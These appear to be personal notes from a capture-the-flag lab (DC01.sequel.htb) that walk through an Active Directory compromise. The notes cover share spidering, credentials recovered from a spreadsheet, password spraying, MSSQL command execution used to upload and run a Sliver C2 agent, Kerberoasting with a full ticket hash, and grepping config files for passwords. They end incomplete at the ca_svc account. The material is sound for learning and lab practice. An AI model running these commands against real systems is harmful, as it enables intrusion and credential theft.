We start out in an assumed-breach scenario with pre-existent credentials: `rose:KxEPkKe6R8su`. Domain: `DC01.sequel.htb` ## `rose` ### LDAP ![[Pasted image 20250203212650.png]] ``` Administrator michael ryan oscar sql_svc rose ca_svc ``` #### `ASREPROAST` no love ### WinRM not permitted ### SMB - command execution? - don't seem to work ![[Pasted image 20250203212048.png]] #### SMB Shares Dumped all the shares using ```sh nxc smb $RHOST -u $USER -p $PASS -M spider_plus -o DOWNLOAD_FLAG=True ``` - `Accounting Department` contains interesting files ```txt [λ]- [Accounting Department]-> tree . ├── accounting_2024.xlsx └── accounts.xlsx 1 directory, 2 files [λ]- [Accounting Department]-> ``` - attempted to open both these files in libreoffice calc and using google sheets, bot applications claims that the files are corrupt. - none of the other files seem to contain anything interesting... - feel like ive exhausted most other approaches, so this kinda gotta be way with the `.xlsx` files. - using "Engrampa" archive manager I managed to extract `sharedStrings.xml` from the `accounts.xlsx` file. This seem to be containing usernames and passwords. ```xml <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si><si><t xml:space="preserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">[email protected]</t></si><si><t xml:space="preserve">angela</t></si><si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si><si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">[email protected]</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si><si><t xml:space="preserve">Kevin</t></si><si><t xml:space="preserve">Malone</t></si><si><t xml:space="preserve">[email protected]</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si><si><t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">[email protected]</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si></sst> ``` ### MSSQL - seems to be able to authenticate - dont seem to be able to execute commands.... ### Password spraying #### SMB ``` oscar:86LxLBMgEWaKUnBG rose:KxEPkKe6R8su ``` #### MSSQL ```sh oscar:86LxLBMgEWaKUnBG rose:KxEPkKe6R8su # with --local-auth sa:MSSQLP@ssw0rd! ``` ## `oscar` `oscar:86LxLBMgEWaKUnBG` - SMB - nothing new - WinRM - not permitted ## `sa` MSQL `sa:MSSQLP@ssw0rd!` ### MSSQL ### TODO - [x] kerberoast - yielded a hash for `ca_svc` - [ ] dump local mssql database - [x] run SharpHound - [ ] **Command execution permitted:** ```sh nxc mssql $RHOST -u $USER -p $PASS --local-auth -x whoami sequel\sql_svc ``` Indicates that we got a local user account. **We can upload a sliver-c2 agent:** ```sh nxc mssql $RHOST -u $USER -p $PASS --local-auth --put-file ./GRUBBY_HARP.exe C:\\Windows\\Temp\\agent.exe ``` ![[Pasted image 20250204124545.png]] **Shell time:** ```sh nxc mssql $RHOST -u $USER -p $PASS --local-auth -x C:\\Windows\\Temp\\agent.exe ``` ### Internal Enumeration #### Bloodhound - shows kerberoastable users: - `ca_svc` - `sql_svc` - `ca_svc` is a member of ` ![[Pasted image 20250204144156.png]] #### Kerberoasting **Manual SPN user enumeration:** ``` Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName | Select-Object Name, SamAccountName, ServicePrincipalName Name SamAccountName ServicePrincipalName ---- -------------- -------------------- krbtgt krbtgt {kadmin/changepw} SQL Service sql_svc {sequel.htb/sql_svc.DC01} Certification Authority ca_svc {sequel.htb/ca_svc.DC01} ``` Using [[Rubeus - TODO]] to extract hashes for the service accounts: ``` [*] SamAccountName : sql_svc [*] DistinguishedName : CN=SQL Service,CN=Users,DC=sequel,DC=htb ... [*] SamAccountName : ca_svc [*] DistinguishedName : CN=Certification Authority,CN=Users,DC=sequel,DC=htb [*] ServicePrincipalName : sequel.htb/ca_svc.DC01 [*] PwdLastSet : 2/4/2025 4:47:28 AM [*] Supported ETypes : RC4_HMAC_DEFAULT [*] Hash : $krb5tgs$23$*ca_svc$sequel.htb$sequel.htb/[email protected]*$3B7B219DFB2795D32C6E31D1713CF9FA$C8CF9D9460730D3CDC21D80542A4C2DCA7D8CE5DAA95AEA8F18CC6B8BDD7C47338FC69F2ACAC44A7FC50FDD1FB41EE63F09356E63A7032D4CD31DB4C87DEFB8F338872CAFFF9C4F824401CE4D59CCAC6FC57373386D0B14C744F22C10381EA3448A9C082C0A75F3478C4EDCEAB5C8F24CD98ABF57028BF4A297DFA36EACC17C2A871211E6EA4238C9C1646FCFAE1913E016C1E2389DA5779A9036A89AC8E33C3AB053783F51F76763D9A6B278751396B43A64A236D5AF636270BDF2BAF6253D9913B00085CFEE760C7938230A88446D2EA616FE7A2B54D54CDF978878E9BE9AE8443A0AA1906E4A19EA821A381C6065BB158651BCB58E6847AEF5C3E793877F29FBDF3773A8705EC9A2AE9EDD0B0F8C3920F5B68B90678425EAF4BA0B7FBC1626E83507A81F4751154F92D0478934F4CFE04B0367C9488614F6B04676A3DA29CFAE9476489B2D39588C0E36D91E345448DA181ED5D74C8621F897E35383888C5CCEE80C7CBCE47F15138DE9553D897BF40050D6965CACD8B463B9AC52E8D2077653FD52227A51CE0412672D0477EF6DA096FBE6A7960A3E00F3FD108E0BE8EC98D08875A9F6F9A7AAC61128C6469937A8695947BD7C03F0DA721A2F89FBF3904A654A9A7BFC060569D67C84D708EFB9BA05FFA2E1520CDEF543A24D49483D8B24F53AB51B04A36A972EA94E83FA44436DF5F0A47EB6F7DBB5533EB1D83E02B13F4CE33B896348ADFC71B83490CD9C029CB7712571E9444A80E017349F862A0E9749806C00BEFCD176BBF0829530D77640DAA3F3B789D8293EBFDE83B093CD51F6EE0A9B1DBF029448E3C35FB333B9642B1D8D16AC668F38122BECFF74D9C2283BA0560561E2A06A99D818B3537E7D7F734E66446DC95ACE02228C78C03B0CC39F98096B92605496D8AC542B585C29CB1EFCC10E55D3DF9E7565FDF1E5C65E739D9D624F1F27C74D6B3456C1645556D3EA4950D39F77763C3CA757A8042DB21FC8AA5DBDEAFE411D56998D34C5A01E3F3A1F2ADACB83256AA841BA4E24CD62550F3B90ADF7328F7AE8B80037BB29E4A144E25854F98BCE9ABAE4E0D80FFEDFB1384570A9BE7C50C1F6B1DDE6D3EEF2E3CB3925665218DB395F6F1C9008ABBC991C03DCC1A734503CA3B765E3C56157D2020F724C6E64322A0A5A2F44F8659C0B57497D1F0D7320230ECC31525D20590453E979E7D120D28426EB7EBBC6CE9AB76E0B83772CC5502EEE566EF9F478BAF608AC57306B65E37CC238D5E2C83221B13C5445110FB468C82F2018B8283573CCD76C6825E2E9A75C18336A28D75333D5F3F999F334E92E029EC42260F0D72478451DE099B7A972761FB97615B98AD58F3ACE41C32330FE624CD40C463595D93CFA62E43AA6E2F694CA48563EE6A13E55CB073F1C667C7DFB8BAE6667AECA29C9912328BD4EBE185C09EFCFBA21E4AF19F94B5D66E71BF83CA96883E8828C33587E83DABF96FC4A52EA15A715B9CF48218F061C9906F389339FFDDBDFC3D47109EF47FF07025139F2165F6D03D0CA4B20A29C48DE977DEE474D770D5969BE494C357F6588EAD23C4CF865E626EDF5929FABB5217179ABFBCC6DCE7F2D0D4ECB8725F60A885E24CFB45117134B9B5609767909E953C03924AF36F2357D235455667BB74CF36442351A003DB168810647E79D2A00684F3B734C674A9DCD2D32F63F1BBEB0E2A42AF90C57F0241AB ``` Considering that we already got the password for `svc_sql` we'll have a gander at `ca_svc`. Attempts at cracking the hash fails: ```sh hashcat -m 13100 ca_svc.hash ~/arsenal/resources/rockyou.txt --force --attack-mode=0 --status ... Session..........: hashcat Status...........: Exhausted Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: $krb5tgs$23$*ca_svc$sequel.htb$sequel.htb/ca_svc.DC...0241ab Time.Started.....: Tue Feb 4 14:28:30 2025, (7 secs) Time.Estimated...: Tue Feb 4 14:28:37 2025, (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/home/noctua/arsenal/resources/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 2152.2 kH/s (2.24ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new) Progress.........: 14344384/14344384 (100.00%) Rejected.........: 0/14344384 (0.00%) Restore.Point....: 14344384/14344384 (100.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103] Hardware.Mon.#1..: Temp: 78c Util: 73% Started: Tue Feb 4 14:28:29 2025 Stopped: Tue Feb 4 14:28:38 2025 ``` #### Credential Hunting ```powershell Get-ChildItem -Path C:\SQL2019 -Include "*.json", "*.ini" -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password" # yields ExpressAdv_ENU\sql-Configuration.INI:19:SQLSVCPASSWORD="WqSZAF6CysDQbGb3" ``` ``` cat Sql-Configuration.ini [OPTIONS] ACTION="Install" QUIET="True" FEATURES=SQL INSTANCENAME="SQLEXPRESS" INSTANCEID="SQLEXPRESS" RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS" AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE" AGTSVCSTARTUPTYPE="Manual" COMMFABRICPORT="0" COMMFABRICNETWORKLEVEL=""0" COMMFABRICENCRYPTION="0" MATRIXCMBRICKCOMMPORT="0" SQLSVCSTARTUPTYPE="Automatic" FILESTREAMLEVEL="0" ENABLERANU="False" SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS" SQLSVCACCOUNT="SEQUEL\sql_svc" SQLSVCPASSWORD="WqSZAF6CysDQbGb3" SQLSYSADMINACCOUNTS="SEQUEL\Administrator" SECURITYMODE="SQL" SAPWD="MSSQLP@ssw0rd!" ADDCURRENTUSERASSQLADMIN="False" TCPENABLED="1" NPENABLED="1" BROWSERSVCSTARTUPTYPE="Automatic" IAcceptSQLServerLicenseTerms=True ``` we verify that the following credentials are valid: ``` ryan:WqSZAF6CysDQbGb3 sql_svc:WqSZAF6CysDQbGb3 ``` ## `ryan` We leverage the fact that `ryan` has `CanPSRemote` (ie. we are able to leverage Evil-WinRM). Nonetheless, we'll also drop a sliverc2 payload onto the system and execute it as `ryan`. - `ryan` is a `WriteOwner` on `CA_SVC` which appears to hold the keys to the kingdom. ![[Pasted image 20250204210915.png]] ## `ca_svc` - appears to be the key to the mystery